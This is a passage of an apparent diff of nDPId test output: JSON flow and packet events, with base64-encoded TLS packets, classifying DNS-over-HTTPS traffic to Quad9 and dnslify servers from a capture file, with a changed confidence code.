HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R88DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"thread_ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF
4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBk
iSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6lHCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="} 
-00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"thread_ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgW
wWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxywR21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgm
bMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTIdMvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJbpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"} 
-00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 